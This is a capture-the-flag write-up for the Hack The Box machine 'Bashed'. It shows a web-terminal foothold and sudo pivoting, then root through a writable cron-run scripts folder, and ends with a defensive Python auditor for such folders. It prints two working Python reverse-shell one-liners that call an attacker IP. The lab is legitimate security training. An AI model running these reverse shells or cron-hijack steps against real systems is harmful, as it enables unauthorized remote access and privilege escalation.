HTB : Bashed


https://app.hackthebox.com/machines/Bashed


Review

  • Directory enumeration reveals a browser-based terminal that provides initial access.
  • Run a Python reverse shell to get a user shell back on Kali.
  • The sudo configuration allows running commands as the user “scriptmanager” without specifying a password.
  • .py files in the /scripts folder are run by a cron job as root.
  • Create a Python file with a reverse shell and root access will be gained.

Enumeration

Run an nmap scan to find open ports.

Port 80 shows us the following.

Nothing interesting

Run a gobuster scan to find hidden directories.

/dev/ gives us the following.

A browser-based Linux terminal.

The user arrexel has the user.txt file.


Foothold

Use a Python reverse shell script to spawn a shell on Kali.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Start a netcat listener.

sudo -l indicates we are able to use sudo as scriptmanager.

Spawn a Python shell and run sudo as scriptmanager.

Find the scripts folder.

There is a Python script that writes a txt file.

To check if it's a cron job, I tried removing the test.txt file but was unable to do so. Rename the file and after some time a new test.txt file appears.

This machine seems to run .py files as a cron job, and the job is run by root.


Privilege escalation

Let’s create a new Python script with a reverse shell to our machine.

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > exploit.py

Root shell is gained.

The final flag is found.
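
The escalation works because root's cron job executes .py files from a folder that a lower-privileged account can write to. As an added example (not part of the original write-up), this Python check lists the entries in such a directory that a non-root account owns or can modify; the function name and the sample directory are assumptions made for illustration.

```python
import os
import stat
import sys
import tempfile


def audit_root_script_dir(path, trusted_uids=frozenset({0}), trusted_gids=frozenset({0})):
    """List (path, reason) pairs showing who besides root can change code
    in a directory whose scripts a root-owned job executes."""
    targets = [path]
    for root, dirs, files in os.walk(path):
        targets += [os.path.join(root, name) for name in sorted(dirs + files)]
    findings = []
    for target in targets:
        st = os.lstat(target)  # lstat: report symlinks instead of following them
        if stat.S_ISLNK(st.st_mode):
            findings.append((target, "symlink, audit its target separately"))
            continue
        if st.st_uid not in trusted_uids:
            findings.append((target, f"owned by uid {st.st_uid}"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((target, "world-writable"))
        elif st.st_mode & stat.S_IWGRP and st.st_gid not in trusted_gids:
            findings.append((target, f"writable by gid {st.st_gid}"))
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_dir = sys.argv[1]
    else:
        # Constructed sample: a scripts directory owned by the current
        # (non-root) user, standing in for /scripts owned by scriptmanager.
        target_dir = tempfile.mkdtemp(prefix="scripts-")
        with open(os.path.join(target_dir, "test.py"), "w") as fh:
            fh.write("open('test.txt', 'w').write('testing')\n")
    for item, reason in audit_root_script_dir(target_dir):
        print(f"{item}: {reason}")
```

Any finding on a directory that root's cron job reads from means the job should be pointed at a root-owned, non-writable location or changed to run as the unprivileged account.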
